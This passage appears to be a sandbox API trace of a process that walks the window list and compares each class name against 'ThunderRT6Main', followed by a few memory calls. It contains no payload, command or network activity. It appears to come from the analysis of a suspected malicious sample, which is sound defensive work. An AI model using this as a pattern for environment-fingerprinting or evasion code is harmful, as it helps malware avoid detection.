lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.026] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.026] GetWindowThreadProcessId (in: hWnd=0x301be, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdf8 [0232.027] GetWindow (hWnd=0x301be, uCmd=0x2) returned 0x5004a [0232.027] GetClassNameA (in: hWnd=0x5004a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="postage_Saturday_") returned 17 [0232.027] lstrcmpA (lpString1="postage_Saturday_", lpString2="ThunderRT6Main") returned -1 [0232.027] GetWindowThreadProcessId (in: hWnd=0x5004a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xde4 [0232.027] GetWindow (hWnd=0x5004a, uCmd=0x2) returned 0x20196 [0232.027] GetClassNameA (in: hWnd=0x20196, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.027] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.027] GetWindowThreadProcessId (in: hWnd=0x20196, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xde4 [0232.027] GetWindow (hWnd=0x20196, uCmd=0x2) returned 0x40032 [0232.027] GetClassNameA (in: hWnd=0x40032, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Worlds_electric_app") returned 19 [0232.027] lstrcmpA (lpString1="Worlds_electric_app", lpString2="ThunderRT6Main") returned 1 [0232.027] GetWindowThreadProcessId (in: hWnd=0x40032, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdd4 [0232.027] GetWindow (hWnd=0x40032, uCmd=0x2) returned 0x4004e [0232.027] GetClassNameA (in: hWnd=0x4004e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.027] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.027] GetWindowThreadProcessId (in: hWnd=0x4004e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdd4 [0232.027] GetWindow (hWnd=0x4004e, uCmd=0x2) returned 0x50066 [0232.027] GetClassNameA (in: hWnd=0x50066, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="roadsGnomeKentclass") returned 19 [0232.027] lstrcmpA (lpString1="roadsGnomeKentclass", lpString2="ThunderRT6Main") returned -1 [0232.027] GetWindowThreadProcessId (in: hWnd=0x50066, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xaa8 [0232.028] GetWindow (hWnd=0x50066, uCmd=0x2) returned 0x30062 [0232.028] GetClassNameA (in: hWnd=0x30062, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.028] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.028] GetWindowThreadProcessId (in: hWnd=0x30062, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xaa8 [0232.028] GetWindow (hWnd=0x30062, uCmd=0x2) returned 0x30174 [0232.028] GetClassNameA (in: hWnd=0x30174, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Gif_resulting_wnd") returned 17 [0232.028] lstrcmpA (lpString1="Gif_resulting_wnd", lpString2="ThunderRT6Main") returned -1 [0232.028] GetWindowThreadProcessId (in: hWnd=0x30174, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x990 [0232.028] GetWindow (hWnd=0x30174, uCmd=0x2) returned 0x50070 [0232.028] GetClassNameA (in: hWnd=0x50070, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.028] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.028] GetWindowThreadProcessId (in: hWnd=0x50070, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x990 [0232.028] GetWindow (hWnd=0x50070, uCmd=0x2) returned 0x30170 [0232.028] GetClassNameA (in: hWnd=0x30170, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="adoptionDrywnd") returned 14 [0232.028] lstrcmpA (lpString1="adoptionDrywnd", lpString2="ThunderRT6Main") returned -1 [0232.028] GetWindowThreadProcessId (in: hWnd=0x30170, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xcac [0232.028] GetWindow (hWnd=0x30170, uCmd=0x2) returned 0x20172 [0232.028] GetClassNameA (in: hWnd=0x20172, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.028] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.028] GetWindowThreadProcessId (in: hWnd=0x20172, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xcac [0232.028] GetWindow (hWnd=0x20172, uCmd=0x2) returned 0x3016e [0232.028] GetClassNameA (in: hWnd=0x3016e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="AnotherCrossDroppedwin") returned 22 [0232.028] lstrcmpA (lpString1="AnotherCrossDroppedwin", lpString2="ThunderRT6Main") returned -1 [0232.028] GetWindowThreadProcessId (in: hWnd=0x3016e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xca0 [0232.028] GetWindow (hWnd=0x3016e, uCmd=0x2) returned 0x2016c [0232.028] GetClassNameA (in: hWnd=0x2016c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.028] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.028] GetWindowThreadProcessId (in: hWnd=0x2016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xca0 [0232.028] GetWindow (hWnd=0x2016c, uCmd=0x2) returned 0x301cc [0232.028] GetClassNameA (in: hWnd=0x301cc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Newsletterkdeclaimedcls") returned 23 [0232.028] lstrcmpA (lpString1="Newsletterkdeclaimedcls", lpString2="ThunderRT6Main") returned -1 [0232.029] GetWindowThreadProcessId (in: hWnd=0x301cc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd6c [0232.029] GetWindow (hWnd=0x301cc, uCmd=0x2) returned 0x2016a [0232.029] GetClassNameA (in: hWnd=0x2016a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.029] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.029] GetWindowThreadProcessId (in: hWnd=0x2016a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd6c [0232.029] GetWindow (hWnd=0x2016a, uCmd=0x2) returned 0x3011e [0232.029] GetClassNameA (in: hWnd=0x3011e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="mrs_Tft_") returned 8 [0232.029] lstrcmpA (lpString1="mrs_Tft_", lpString2="ThunderRT6Main") returned -1 [0232.029] GetWindowThreadProcessId (in: hWnd=0x3011e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4b0 [0232.029] GetWindow (hWnd=0x3011e, uCmd=0x2) returned 0x20202 [0232.029] GetClassNameA (in: hWnd=0x20202, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.029] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.029] GetWindowThreadProcessId (in: hWnd=0x20202, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4b0 [0232.029] GetWindow (hWnd=0x20202, uCmd=0x2) returned 0x400ac [0232.029] GetClassNameA (in: hWnd=0x400ac, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="NswClaimswindow") returned 15 [0232.029] lstrcmpA (lpString1="NswClaimswindow", lpString2="ThunderRT6Main") returned -1 [0232.029] GetWindowThreadProcessId (in: hWnd=0x400ac, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x560 [0232.029] GetWindow (hWnd=0x400ac, uCmd=0x2) returned 0x20104 [0232.029] GetClassNameA (in: hWnd=0x20104, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.029] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.029] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x560 [0232.029] GetWindow (hWnd=0x20104, uCmd=0x2) returned 0x3009c [0232.029] GetClassNameA (in: hWnd=0x3009c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Planehospitalcls") returned 16 [0232.029] lstrcmpA (lpString1="Planehospitalcls", lpString2="ThunderRT6Main") returned -1 [0232.029] GetWindowThreadProcessId (in: hWnd=0x3009c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x554 [0232.029] GetWindow (hWnd=0x3009c, uCmd=0x2) returned 0x300f0 [0232.029] GetClassNameA (in: hWnd=0x300f0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.029] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.029] GetWindowThreadProcessId (in: hWnd=0x300f0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x554 [0232.029] GetWindow (hWnd=0x300f0, uCmd=0x2) returned 0x1022e [0232.030] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0232.030] lstrcmpA (lpString1="Windows.UI.Core.CoreWindow", lpString2="ThunderRT6Main") returned 1 [0232.030] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd5c [0232.030] GetWindow (hWnd=0x1022e, uCmd=0x2) returned 0x10230 [0232.030] GetClassNameA (in: hWnd=0x10230, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.030] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.030] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd5c [0232.030] GetWindow (hWnd=0x10230, uCmd=0x2) returned 0x1022c [0232.030] GetClassNameA (in: hWnd=0x1022c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0232.030] lstrcmpA (lpString1="BluetoothNotificationAreaIconWindowClass", lpString2="ThunderRT6Main") returned -1 [0232.030] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd38 [0232.030] GetWindow (hWnd=0x1022c, uCmd=0x2) returned 0x1021c [0232.030] GetClassNameA (in: hWnd=0x1021c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="PNIHiddenWnd") returned 12 [0232.030] lstrcmpA (lpString1="PNIHiddenWnd", lpString2="ThunderRT6Main") returned -1 [0232.030] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd38 [0232.030] GetWindow (hWnd=0x1021c, uCmd=0x2) returned 0x10218 [0232.030] GetClassNameA (in: hWnd=0x10218, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0232.030] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0232.030] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd34 [0232.030] GetWindow (hWnd=0x10218, uCmd=0x2) returned 0x10214 [0232.030] GetClassNameA (in: hWnd=0x10214, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0232.030] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0232.030] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd34 [0232.030] GetWindow (hWnd=0x10214, uCmd=0x2) returned 0x10216 [0232.030] GetClassNameA (in: hWnd=0x10216, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.030] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.030] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd34 [0232.030] GetWindow (hWnd=0x10216, uCmd=0x2) returned 0x10208 [0232.030] GetClassNameA (in: hWnd=0x10208, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ATL:00007FFCF8E5E130") returned 20 [0232.030] lstrcmpA (lpString1="ATL:00007FFCF8E5E130", lpString2="ThunderRT6Main") returned -1 [0232.030] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd38 [0232.031] GetWindow (hWnd=0x10208, uCmd=0x2) returned 0x1020a [0232.031] GetClassNameA (in: hWnd=0x1020a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.031] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.031] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd38 [0232.031] GetWindow (hWnd=0x1020a, uCmd=0x2) returned 0x101ea [0232.031] GetClassNameA (in: hWnd=0x101ea, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="SystemTray_Main") returned 15 [0232.031] lstrcmpA (lpString1="SystemTray_Main", lpString2="ThunderRT6Main") returned -1 [0232.031] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xccc [0232.031] GetWindow (hWnd=0x101ea, uCmd=0x2) returned 0x101e8 [0232.031] GetClassNameA (in: hWnd=0x101e8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OleDdeWndClass") returned 14 [0232.031] lstrcmpA (lpString1="OleDdeWndClass", lpString2="ThunderRT6Main") returned -1 [0232.031] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.031] GetWindow (hWnd=0x101e8, uCmd=0x2) returned 0x101e2 [0232.031] GetClassNameA (in: hWnd=0x101e2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0232.031] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0232.031] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xccc [0232.031] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101e4 [0232.031] GetClassNameA (in: hWnd=0x101e4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.031] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.031] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xccc [0232.031] GetWindow (hWnd=0x101e4, uCmd=0x2) returned 0x101ca [0232.031] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0232.031] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0232.031] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc34 [0232.031] GetWindow (hWnd=0x101ca, uCmd=0x2) returned 0x101ce [0232.031] GetClassNameA (in: hWnd=0x101ce, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.031] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.031] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc34 [0232.031] GetWindow (hWnd=0x101ce, uCmd=0x2) returned 0x10166 [0232.031] GetClassNameA (in: hWnd=0x10166, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="TabletModeCoverWindow") returned 21 [0232.032] lstrcmpA (lpString1="TabletModeCoverWindow", lpString2="ThunderRT6Main") returned -1 [0232.032] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0232.032] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x201dc [0232.032] GetClassNameA (in: hWnd=0x201dc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0232.032] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0232.032] GetWindowThreadProcessId (in: hWnd=0x201dc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0232.032] GetWindow (hWnd=0x201dc, uCmd=0x2) returned 0x201da [0232.032] GetClassNameA (in: hWnd=0x201da, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0232.032] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0232.032] GetWindowThreadProcessId (in: hWnd=0x201da, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0232.032] GetWindow (hWnd=0x201da, uCmd=0x2) returned 0x1015e [0232.032] GetClassNameA (in: hWnd=0x1015e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0232.032] lstrcmpA (lpString1="DummyDWMListenerWindow", lpString2="ThunderRT6Main") returned -1 [0232.032] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0232.032] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x10158 [0232.032] GetClassNameA (in: hWnd=0x10158, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0232.032] lstrcmpA (lpString1="EdgeUiInputTopWndClass", lpString2="ThunderRT6Main") returned -1 [0232.032] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0232.032] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x1013e [0232.032] GetClassNameA (in: hWnd=0x1013e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OleDdeWndClass") returned 14 [0232.032] lstrcmpA (lpString1="OleDdeWndClass", lpString2="ThunderRT6Main") returned -1 [0232.032] GetWindowThreadProcessId (in: hWnd=0x1013e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0232.032] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x200ca [0232.032] GetClassNameA (in: hWnd=0x200ca, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OfficePowerManagerWindow") returned 24 [0232.032] lstrcmpA (lpString1="OfficePowerManagerWindow", lpString2="ThunderRT6Main") returned -1 [0232.032] GetWindowThreadProcessId (in: hWnd=0x200ca, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa08 [0232.032] GetWindow (hWnd=0x200ca, uCmd=0x2) returned 0x10134 [0232.032] GetClassNameA (in: hWnd=0x10134, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0232.032] lstrcmpA (lpString1="ApplicationManager_DesktopShellWindow", lpString2="ThunderRT6Main") returned -1 [0232.032] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0232.033] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10130 [0232.033] GetClassNameA (in: hWnd=0x10130, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0232.033] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0232.033] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0232.033] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10132 [0232.033] GetClassNameA (in: hWnd=0x10132, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.033] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.033] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0232.033] GetWindow (hWnd=0x10132, uCmd=0x2) returned 0x10128 [0232.033] GetClassNameA (in: hWnd=0x10128, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0232.033] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0232.037] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0232.037] GetWindow (hWnd=0x10128, uCmd=0x2) returned 0x10124 [0232.037] GetClassNameA (in: hWnd=0x10124, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0232.037] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0232.037] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0232.037] GetWindow (hWnd=0x10124, uCmd=0x2) returned 0x10122 [0232.037] GetClassNameA (in: hWnd=0x10122, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0232.037] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0232.037] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0232.037] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10118 [0232.037] GetClassNameA (in: hWnd=0x10118, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0232.037] lstrcmpA (lpString1="PushNotificationsPowerManagement", lpString2="ThunderRT6Main") returned -1 [0232.037] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x814 [0232.037] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x1011a [0232.037] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.037] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.037] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x814 [0232.037] GetWindow (hWnd=0x1011a, uCmd=0x2) returned 0x10110 [0232.037] GetClassNameA (in: hWnd=0x10110, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0232.037] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0232.037] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x81c [0232.037] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x10112 [0232.037] GetClassNameA (in: hWnd=0x10112, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.038] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.038] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x81c [0232.038] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10108 [0232.038] GetClassNameA (in: hWnd=0x10108, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0232.038] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0232.038] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.038] GetWindow (hWnd=0x10108, uCmd=0x2) returned 0x100f6 [0232.038] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0232.038] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0232.038] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.038] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x20052 [0232.038] GetClassNameA (in: hWnd=0x20052, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0232.038] lstrcmpA (lpString1="MS_WebcheckMonitor", lpString2="ThunderRT6Main") returned -1 [0232.038] GetWindowThreadProcessId (in: hWnd=0x20052, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd34 [0232.038] GetWindow (hWnd=0x20052, uCmd=0x2) returned 0x100c2 [0232.038] GetClassNameA (in: hWnd=0x100c2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0232.038] lstrcmpA (lpString1="NotifyIconOverflowWindow", lpString2="ThunderRT6Main") returned -1 [0232.038] GetWindowThreadProcessId (in: hWnd=0x100c2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.038] GetWindow (hWnd=0x100c2, uCmd=0x2) returned 0x2003a [0232.038] GetClassNameA (in: hWnd=0x2003a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0232.038] lstrcmpA (lpString1="COMTASKSWINDOWCLASS", lpString2="ThunderRT6Main") returned -1 [0232.038] GetWindowThreadProcessId (in: hWnd=0x2003a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4bc [0232.038] GetWindow (hWnd=0x2003a, uCmd=0x2) returned 0x20018 [0232.038] GetClassNameA (in: hWnd=0x20018, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="DDEMLEvent") returned 10 [0232.038] lstrcmpA (lpString1="DDEMLEvent", lpString2="ThunderRT6Main") returned -1 [0232.038] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0232.038] GetWindow (hWnd=0x20018, uCmd=0x2) returned 0x2001c [0232.038] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="DDEMLMom") returned 8 [0232.038] lstrcmpA (lpString1="DDEMLMom", lpString2="ThunderRT6Main") returned -1 [0232.038] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0232.039] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x2001a [0232.039] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.039] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.039] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0232.039] GetWindow (hWnd=0x2001a, uCmd=0x2) returned 0x1003e [0232.039] GetClassNameA (in: hWnd=0x1003e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Dwm") returned 3 [0232.039] lstrcmpA (lpString1="Dwm", lpString2="ThunderRT6Main") returned -1 [0232.039] GetWindowThreadProcessId (in: hWnd=0x1003e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x360 [0232.039] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1008e [0232.039] GetClassNameA (in: hWnd=0x1008e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="CicLoaderWndClass") returned 17 [0232.039] lstrcmpA (lpString1="CicLoaderWndClass", lpString2="ThunderRT6Main") returned -1 [0232.039] GetWindowThreadProcessId (in: hWnd=0x1008e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x598 [0232.039] GetWindow (hWnd=0x1008e, uCmd=0x2) returned 0x1010a [0232.039] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Progman") returned 7 [0232.039] lstrcmpA (lpString1="Progman", lpString2="ThunderRT6Main") returned -1 [0232.039] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0232.039] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x0 [0232.039] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x18) returned 0x1d3a4293a10 [0232.039] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a4293a10) [0232.239] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x420) returned 0x1d39d9c99d0 [0232.240] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d398212f40, cb=0x0) returned 0x0 [0232.240] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d3a409eee0 [0232.240] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x8) returned 0x1d3a409eeb0 